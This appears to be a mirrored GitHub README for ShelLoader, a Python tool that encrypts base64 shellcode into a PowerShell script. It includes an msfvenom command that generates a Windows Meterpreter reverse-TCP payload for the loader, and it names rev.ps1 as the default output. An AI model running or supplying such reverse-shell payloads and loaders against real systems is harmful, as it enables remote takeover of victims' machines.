这是indexloc提供的服务,不要输入任何密码
Skip to content

Nu1LD4y/ShelLoader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

A Python script inspired by the Ghost-Shells from mrvar0x.com, designed to quickly generate PS1 scripts.

$ python3 shelLoader.py -h
   _____ _          _ _                     _            
  / ____| |        | | |                   | |          
 | (___ | |__   ___| | |     ___   __ _  __| | ___ _ __  
  \___ \| '_ \ / _ \ | |    / _ \ / _` |/ _` |/ _ \ '__|
  ____) | | | |  __/ | |___| (_) | (_| | (_| |  __/ |    
 |_____/|_| |_|\___|_|______\___/ \__,_|\__,_|\___|_| > By NulLD4y               
          
usage: shelLoader.py [-h] [-f FILE] [-s SHELLCODE] [-o OUTPUT]

Encrypt shellcode and generate PowerShell script

options:
  -h, --help            show this help message and exit
  -f, --file FILE       Input file containing base64 shellcode
  -s, --shellcode SHELLCODE
                        Base64 shellcode string
  -o, --output OUTPUT   Output PowerShell script file (default: rev.ps1)

example:

    $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=7414 -f raw | base64 > b64rev
    $ python3 shelLoader.py -f b64rev

About

A Python script inspired by the Ghost-Shells from mrvar0x.com

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages